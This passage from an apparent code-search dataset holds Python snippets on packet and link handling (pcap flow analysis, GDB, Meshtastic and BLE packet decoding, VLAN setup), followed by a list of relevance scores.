packet.data[i[1]])\n\t\t\t\n\t\t\toutput += append\n\t\t\treturn output\n\t\texcept Exception:\n\t\t\traise", "def get_pkt(self):\n return self.pkt", "def _validate_type(self):\n if self._type != \"link\":\n raise securesystemslib.exceptions.FormatError(\n \"Invalid Link: field `_type` must be set to 'link', got: {}\"\n .format(self._type))", "def 
detach_typed_link(self, typed_link_specifier: Dict[str, Any]):\n return cd_client.detach_typed_link(\n DirectoryArn=self._dir_arn,\n TypedLinkSpecifier=typed_link_specifier\n )", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def link_converter(self):\n for index, radio_field in enumerate(self.radios):\n radio_field = wtp.parse(radio_field)\n have_wiki = True if radio_field.wikilinks else False\n if have_wiki:\n radio_name = radio_field.wikilinks[0].title\n else:\n radio_name = str(radio_field)\n\n #replace raw wikitext by a RadioCell element\n self.radios[index] = RadioCell(radio_name, have_wiki)", "def new_packet():\n return rtmp_packet.RtmpPacket()", "def convert_lsdb_to_graph_info(lsdb) :\n\n links = []\n\n # trace router lsa, link type 1 and 4\n for lsa_id, lsa in lsdb.rdb.items() :\n for rlink in lsa.attached_links :\n if rlink.link_type == P2P_LINK or rlink.link_type == VIRTUAL_LINK :\n links.append({\"source\": \"rtr:\" + lsa_id,\n \"target\": \"rtr:\" + rlink.link_id})\n\n # trace network lsa.\n for lsa_id, lsa in lsdb.ndb.items() :\n for attached in lsa.attached_routers :\n links.append({\"source\": \"net:\" + lsa_id,\n \"target\": \"rtr:\" + attached})\n\n # generate node info\n nodes = []\n for x in lsdb.rdb.keys() : nodes.append({\"id\" : \"rtr:\" + x,\n \"type\" : \"router\",\n \"name\": x})\n for x in lsdb.ndb.keys() : nodes.append({\"id\" : \"net:\" + x,\n \"type\" : \"network\",\n \"name\": x})\n\n return {\"nodes\": nodes, \"links\": links }", "def _decode_link(self, link):\n\n if link.HasField(\"bucket\"):\n bucket = link.bucket\n else:\n bucket = None\n if link.HasField(\"key\"):\n key = link.key\n else:\n key = None\n if link.HasField(\"tag\"):\n tag = link.tag\n else:\n tag = None\n\n return (bucket, key, tag)", "def decodepkt(self, pkt):\n res = \"\"\n if pkt.startswith('$'):\n try:\n self.logger.debug('unpack< %s', pkt) \n res = self.unpack(pkt)\n except ValueError as ex:\n self.logger.debug('GDB-< %s', res)\n self.logger.warning('Bad packet %s', ex) \n self.s.send(b'-')\n else:\n self.s.send(b'+')\n self.logger.debug('GDB+< %s', res) \n return res\n else:\n self.logger.warning('discards %s', pkt)", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def _parse_ip_stats_link_show(raw_result):\n\n show_re = (\n r'.+?RX:.*?\\n'\n r'\\s*(?P<rx_bytes>\\d+)\\s+(?P<rx_packets>\\d+)\\s+(?P<rx_errors>\\d+)\\s+'\n r'(?P<rx_dropped>\\d+)\\s+(?P<rx_overrun>\\d+)\\s+(?P<rx_mcast>\\d+)'\n r'.+?TX:.*?\\n'\n r'\\s*(?P<tx_bytes>\\d+)\\s+(?P<tx_packets>\\d+)\\s+(?P<tx_errors>\\d+)\\s+'\n r'(?P<tx_dropped>\\d+)\\s+(?P<tx_carrier>\\d+)\\s+(?P<tx_collisions>\\d+)'\n )\n\n re_result = match(show_re, raw_result, DOTALL)\n result = None\n\n if (re_result):\n result = re_result.groupdict()\n for key, value in result.items():\n if value is not None:\n if value.isdigit():\n result[key] = int(value)\n\n return result", "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now 
unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, 
tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def packet(self):\n return self.server.packet(context=self.ctx)", "def add_link_type_vlan(enode, portlbl, name, vlan_id, shell=None):\n assert name\n if name in enode.ports:\n raise ValueError('Port {name} already exists'.format(name=name))\n\n assert portlbl\n assert vlan_id\n port = enode.ports[portlbl]\n\n cmd = 'ip link add link {dev} name {name} type vlan id {vlan_id}'.format(\n dev=port, name=name, vlan_id=vlan_id)\n\n response = enode(cmd, shell=shell)\n assert not response, 'Cannot add virtual link {name}'.format(name=name)\n\n enode.ports[name] = name", "def setupPacket(self):\n return None", "def read(data):\n return Link(**data)", "def dumppkt(self):\n try:\n return ( (k, getattr(self,k)) for k in self.__pkt_fields__ + self.__dyn_fields__ )\n except AttributeError:\n raise KeyError", "def _handlePacketFromRadio(self, meshPacket):\n\n asDict = google.protobuf.json_format.MessageToDict(meshPacket)\n # /add fromId and toId fields based on the node ID\n asDict[\"fromId\"] = self._nodeNumToId(asDict[\"from\"])\n asDict[\"toId\"] = self._nodeNumToId(asDict[\"to\"])\n\n # We could provide our objects as DotMaps - which work with . notation or as dictionaries\n # asObj = DotMap(asDict)\n topic = \"meshtastic.receive\" # Generic unknown packet type\n\n # Warn users if firmware doesn't use new portnum based data encodings\n # But do not crash, because the lib will still basically work and ignore those packet types\n if meshPacket.decoded.HasField(\"user\") or meshPacket.decoded.HasField(\"position\"):\n logging.warn(\"Ignoring old position/user message. Recommend you update firmware to 1.1.20 or later\")\n\n if meshPacket.decoded.HasField(\"data\"):\n\n # The default MessageToDict converts byte arrays into base64 strings.\n # We don't want that - it messes up data payload. So slam in the correct\n # byte array.\n asDict[\"decoded\"][\"data\"][\"payload\"] = meshPacket.decoded.data.payload\n\n # UNKNOWN_APP is the default protobuf portnum value, and therefore if not set it will not be populated at all\n # to make API usage easier, set it to prevent confusion\n if not \"portnum\" in asDict[\"decoded\"][\"data\"]:\n asDict[\"decoded\"][\"data\"][\"portnum\"] = portnums_pb2.PortNum.Name(portnums_pb2.PortNum.UNKNOWN_APP)\n\n portnum = asDict[\"decoded\"][\"data\"][\"portnum\"]\n\n topic = f\"meshtastic.receive.data.{portnum}\"\n\n # For text messages, we go ahead and decode the text to ascii for our users\n if portnum == portnums_pb2.PortNum.Name(portnums_pb2.PortNum.TEXT_MESSAGE_APP):\n topic = \"meshtastic.receive.text\"\n\n # We don't throw if the utf8 is invalid in the text message. 
Instead we just don't populate\n # the decoded.data.text and we log an error message. This at least allows some delivery to\n # the app and the app can deal with the missing decoded representation.\n #\n # Usually btw this problem is caused by apps sending binary data but setting the payload type to\n # text.\n try:\n asDict[\"decoded\"][\"data\"][\"text\"] = meshPacket.decoded.data.payload.decode(\"utf-8\")\n except Exception as ex:\n logging.error(f\"Malformatted utf8 in text message: {ex}\")\n\n # decode position protobufs and update nodedb, provide decoded version as \"position\" in the published msg\n if portnum == portnums_pb2.PortNum.Name(portnums_pb2.PortNum.POSITION_APP):\n topic = \"meshtastic.receive.position\"\n pb = mesh_pb2.Position()\n pb.ParseFromString(meshPacket.decoded.data.payload)\n p = google.protobuf.json_format.MessageToDict(pb)\n self._fixupPosition(p)\n asDict[\"decoded\"][\"data\"][\"position\"] = p\n # update node DB as needed\n self._getOrCreateByNum(asDict[\"from\"])[\"position\"] = p\n\n # decode user protobufs and update nodedb, provide decoded version as \"position\" in the published msg\n if portnum == portnums_pb2.PortNum.Name(portnums_pb2.PortNum.NODEINFO_APP):\n topic = \"meshtastic.receive.user\"\n pb = mesh_pb2.User()\n pb.ParseFromString(meshPacket.decoded.data.payload)\n u = google.protobuf.json_format.MessageToDict(pb)\n asDict[\"decoded\"][\"data\"][\"user\"] = u\n # update node DB as needed\n n = self._getOrCreateByNum(asDict[\"from\"])\n n[\"user\"] = u\n # We now have a node ID, make sure it is uptodate in that table\n self.nodes[u[\"id\"]] = n\n\n logging.debug(f\"Publishing topic {topic}\")\n pub.sendMessage(topic, packet=asDict, interface=self)", "def decode_ad_report(ad_packet):\n # Initialize return object\n ret = { 'type': None, 'adinfo_bytes': len(ad_packet) }\n # Check that we have the minimum ad info header length\n if len(ad_packet) >= 9:\n # Decode advertising report header\n AdInfoHeader = namedtuple('AdInfoHeader', 'event bdaddr_type '\n + 'bdaddr length')\n aih = AdInfoHeader._make(struct.unpack('<BB6sB', ad_packet[:9]))\n # Check if this is valid advertisement info\n if aih.event == 0x03 and aih.bdaddr_type == 0x00 and \\\n aih.length + 10 <= len(ad_packet):\n # This is valid, update the adinfo length\n ret['adinfo_bytes'] = aih.length + 10\n # Add Bluetooth device address to return object\n ret['bdaddr'] = ':'.join(reversed(['%02X' % ord(b)\n for b in aih.bdaddr]))\n # Move to first ad struct\n ad_struct = ad_packet[9:]\n # Create default beacon_data\n beacon_data = {}\n # Iterate over ad structs\n while len(ad_struct) > 1:\n # Try different beacon decoders\n for decoder in decode_ad_struct_list:\n # Run a decoder\n beacon_data = decoder(ad_struct)\n #print beacon_data\n # Stop if this decoder recognized the data\n if beacon_data['type']:\n break\n # Stop if we decoded the beacon data\n if beacon_data['type']:\n break\n # Go to the next ad struct\n ad_struct = ad_struct[beacon_data['adstruct_bytes']:]\n # Add beacon data to return object\n for key, val in beacon_data.iteritems():\n if key != 'adstruct_bytes':\n ret[key] = val\n # Add observed RSSI to return object\n ret['rssi_obs'], = struct.unpack('<b', ad_packet[aih.length + 9])\n # Return the return object\n return ret", "def handle_packet(self, packet, udp_dport):\n return self.process_packet(packet, udp_dport)", "def send_packet(self, raw_packet):\n\n if self.verbose:\n print(\"< %s\" % \" \".join(\"%02x\" % i for i in raw_packet))\n\n # Send the data to the device.\n 
self.ftdi.write(self.ftdi.INTERFACE_A, raw_packet, async_=False)", "def decode_raw(data):\n return RawWire().decode(data)", "def extract_trpt_data(udp_packet):\n logger.debug('UDP packet sport [%s], dport [%s], len [%s]',\n udp_packet.sport, udp_packet.dport, udp_packet.len)\n\n trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)\n trpt_eth = EthInt(trpt_pkt.payload)\n logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',\n trpt_eth.dst, trpt_eth.src, trpt_eth.type)\n return extract_int_data(trpt_eth)", "def decode_network_packet(buf):\n off = 0\n blen = len(buf)\n\n while off < blen:\n ptype, plen = header.unpack_from(buf, off)\n\n if plen > blen - off:\n raise ValueError(\"Packet longer than amount of data in buffer\")\n\n if ptype not in _decoders:\n raise ValueError(\"Message type %i not recognized\" % ptype)\n\n yield ptype, _decoders[ptype](ptype, plen, buf[off:])\n off += plen", "def dump(self, packet):\n # TODO\n packet['type'] = \"table\"\n src = packet['src']\n packet['src'] = packet['dst']\n packet['dst'] = src\n\n table_list = []\n\n # TODO fill out table string with routing table\n table_string = \"\"\n # TODO asking for int indexes instead of string for route?\n for ip in self.updates.keys():\n # TODO have to fill ip address of peer\n\n entry = {'network' : self.updates[ip][MESG][NTWK], 'netmask' : self.updates[ip][MESG][NMSK], 'peer' : ip}\n table_list.append(entry)\n packet[MESG] = table_list\n msg = json.dumps(packet)\n #print(json.dumps(packet, sort_keys=True, indent=4))\n\n sock = self.sockets[src]\n sock.sendall(msg.encode())\n return True", "def setPacket(self, packet):\n\t\tself.clear()\n\t\tself.packet = packet\n\t\t\n\t\tfields = self.fields\n\t\t\n\t\tfields.append(['Reception time', '%s:%s:%s.%s' % tuple(packet.time), None])\n\t\t\n\t\tif self.packet.isInvalid:\n\t\t\treturn\n\t\t\n\t\tfields.append(['Transmission info', 'CRC passed: %s, LQI: %s, RSSI: %s' % (packet.CRCOk, packet.LQI, packet.RSSI), None])\n\t\tfields.append(['PHY fields', '', None])\n\t\tphy = len(fields) - 1\n\t\tfields.append(['Frame length', len(packet.load), phy])\n\t\t\n\t\tfields.append(['MAC fields', '', None])\n\t\tmac = len(fields) - 1\n\t\tfields.append(['Frame control', packet.frameControl, mac])\n\t\tfields.append(['Frame Type', packet.frameType, mac])\n\t\tfields.append(['Security enabled', packet.securityEnabled, mac])\n\t\tfields.append(['Frame pending', packet.framePending, mac])\n\t\tfields.append(['Ack. request', packet.ackRequest, mac])\n\t\tfields.append(['Intra-PAN', packet.intraPAN, mac])\n\t\tfields.append(['Dest. 
addressing mode', packet.dstAddrMode, mac])\n\t\tfields.append(['Source addressing mode', packet.srcAddrMode, mac])\n\t\tfields.append(['Sequence number', packet.seqNumber, mac])\n\t\t\n\t\tif hasattr(packet, 'dstPANID'):\n\t\t\tfields.append(['Destination PAN-ID', packet.dstPANID, mac])\n\t\t\n\t\tif hasattr(packet, 'dstAddr'):\n\t\t\tfields.append(['Destination address', packet.dstAddr, mac])\n\t\t\n\t\tif hasattr(packet, 'srcPANID'):\n\t\t\tfields.append(['Source PAN-ID', packet.srcPANID, mac])\n\t\t\t\n\t\tif hasattr(packet, 'srcAddr'):\n\t\t\tfields.append(['Source address', packet.srcAddr, mac])\n\t\t\t\n\t\tif hasattr(packet, 'payload'):\n\t\t\tfields.append(['Payload', packet.payload, mac])\n\t\t\n\t\tif hasattr(packet, 'commandType'):\n\t\t\tfields.append(['Command type', packet.commandType, mac])\n\t\t\n\t\tif hasattr(packet, 'commandPayload'):\n\t\t\tfields.append(['Command payload', packet.commandPayload, mac])\n\t\t\n\t\tif hasattr(packet, 'superFrameSpec'):\n\t\t\tfields.append(['Superframe specification', packet.superFrameSpec, mac])\n\t\t\tsfs = len(fields) - 1\n\t\t\tfields.append(['Beacon order', packet.beaconOrder, sfs])\n\t\t\tfields.append(['Superframe order', packet.superFrameOrder, sfs])\n\t\t\tfields.append(['finalCAPSlot', packet.finalCAPSlot, sfs])\n\t\t\tfields.append(['Batt. life extension', packet.battLifeExt, sfs])\n\t\t\tfields.append(['PAN Coordinator', packet.PANCoord, sfs])\n\t\t\tfields.append(['Association permit', packet.assocPermit, sfs])\n\t\t\n\t\tif hasattr(packet, 'GTS'):\n\t\t\tfields.append(['GTS specification', packet.GTS, mac])\n\t\t\tgts = len(fields) - 1\n\t\t\tfields.append(['GTS descriptor count', packet.GTSDescrCount, gts])\n\t\t\tfields.append(['GTS permit', packet.GTSPermit, gts])\n\t\t\tif int(packet.GTSDescrCount, 16) > 0:\n\t\t\t\tfields.append(['GTS directions', packet.GTSDirections, gts])\n\t\t\t\tfields.append(['GTS descriptors list', '', gts])\n\t\t\t\tdscList = len(fields) - 1\n\t\t\t\tfor i in xrange(int(packet.GTSDescrCount, 16)):\n\t\t\t\t\tfields.append(['Descriptor #'+str(i), '', dscList])\n\t\t\t\t\td = len(fields) - 1\n\t\t\t\t\tfields.append(['Device short address', packet.GTSDescriptors[i].deviceShortAddr, d])\n\t\t\t\t\tfields.append(['GTS starting slot', packet.GTSDescriptors[i].GTSStartingSlot, d])\n\t\t\t\t\tfields.append(['GTS length', packet.GTSDescriptors[i].GTSLength, d])\n\t\t\t\n\t\t\tfields.append(['Pending addresses list', '', gts])\n\t\t\tpnd = len(fields) - 1\n\t\t\tif int(packet.numShortAddrPnd, 16) > 0 or int(packet.numShortAddrPnd, 16) > 0:\n\t\t\t\tfor i in xrange(int(self.numShortAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Short addr. #%i' % i, packet.shortAddrPndList[i], pnd])\n\n\t\t\t\tfor i in xrange(int(self.numLongAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Long addr. #%i' % i, packet.longAddrPndList[i], pnd])\n\t\t\n\t\tif hasattr(packet, 'bcnPayload'):\n\t\t\tfields.append(['Beacon payload', packet.bcnPayload, mac])\n\t\t\n\t\tself.beginInsertRows(QModelIndex(), 0, len(self.fields)+1)\n\t\tself.endInsertRows()\n\t\tfor field in fields:\n\t\t\tprint field" ]
[ "0.68164754", "0.62622094", "0.5889911", "0.5856772", "0.5697665", "0.52689415", "0.5258935", "0.52217716", "0.5157317", "0.51023954", "0.5042225", "0.5041668", "0.49423012", "0.49230462", "0.4902196", "0.4897916", "0.4865398", "0.48552364", "0.4845798", "0.48386303", "0.48383638", "0.48315713", "0.48302725", "0.48204654", "0.47920337", "0.4756438", "0.47318614", "0.47158575", "0.46967518", "0.4692864", "0.46895728", "0.4677398", "0.46671924", "0.46510032", "0.46491775", "0.46467093", "0.46380758", "0.46345225", "0.46184447", "0.4616935", "0.46125647", "0.4611935", "0.4606365", "0.45981917", "0.4596738", "0.4589551", "0.4587792", "0.4586166", "0.4573079", "0.45440322", "0.45413452", "0.45313165", "0.45258373", "0.45258015", "0.45041004", "0.4496944", "0.4490407", "0.4465584", "0.44652525", "0.44641605", "0.4458836", "0.44547534", "0.44400567", "0.44190434", "0.4405362", "0.44024128", "0.44023976", "0.43972683", "0.43957803", "0.43918607", "0.43900105", "0.43846765", "0.4373963", "0.43721968", "0.43708763", "0.43706474", "0.43701598", "0.436392", "0.43555003", "0.43553132", "0.4345016", "0.43335086", "0.43263817", "0.43141395", "0.4309909", "0.43098027", "0.4300021", "0.42906183", "0.42891818", "0.42877775", "0.4281078", "0.42622164", "0.42520672", "0.42438868", "0.42313784", "0.4230321", "0.42248863", "0.42243904", "0.42223495", "0.42163742" ]
0.63520455
1
Parse a packet from a pcap just enough to gain a flow description tuple
def flowtuple_from_raw(raw, linktype=1):
    ip = iplayer_from_raw(raw, linktype)

    if isinstance(ip, dpkt.ip.IP):
        sip, dip = socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst)
        proto = ip.p
        sport, dport = 0, 0
        l3 = ip.data

        # try to get the layer 3 source and destination port, but its ok if this fails,
        # which will happen when we get IP fragments or packets with invalid checksums
        try:
            sport, dport = l3.sport, l3.dport
        except AttributeError:
            pass

    else:
        sip, dip, proto = 0, 0, -1
        sport, dport = 0, 0

    flowtuple = (sip, dip, sport, dport, proto)

    return flowtuple
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = 
MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def parsePacket(self, packet):\n \n pcktParts = packet.split()\n \n # needs exactly 4 parts\n if len(pcktParts) != 4:\n raise PacketException(\"Packet malformed.\")\n \n direction = pcktParts[0]\n ip = pcktParts[1]\n port = pcktParts[2]\n flag = pcktParts[3]\n\n try:\n pckt = Packet(direction, ip, port, flag)\n except Exception as ex:\n eprint(\"Corrupt Packet:{0} Ignoring packet:\\n{1}\".format(ex, packet.__str__()))\n return None\n \n return pckt", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def _scapy_parse(packet: dict) -> Packet:\n try:\n payload_base64 = packet['packet']['payload'].encode()\n\n # assuming it has a Ethernet layer. 
Scapy will handle the rest.\n packet = Ether(base64.decodebytes(payload_base64))\n\n if IP in packet:\n return packet\n\n return None # actually not interested in packet not having IP layer\n except Exception as e: # FIXME\n logging.debug(e)", "def extract_packet(_buffer):\n if len(_buffer)>=5:\n mtype=_buffer[0]\n msglen=struct.unpack('!L',_buffer[1:5])[0]\n if len(_buffer)>=msglen+1:\n return _buffer[5:msglen+1],mtype,_buffer[msglen+1:]\n return None,None,_buffer", "def parse_packet(linktype, packet):\n link_layer = parse_Ethernet(packet) if linktype == pcapy.DLT_EN10MB else parse_Cooked(packet)\n if link_layer['payload_type'] in ['IPv4', 'IPv6']:\n network_layer = parse_IPv4(link_layer['payload']) if link_layer['payload_type'] == 'IPv4' else parse_IPv6(link_layer['payload'])\n if network_layer['payload_type'] in ['UDP', 'TCP']:\n transport_layer = parse_UDP(network_layer['payload']) if network_layer['payload_type'] == 'UDP' else 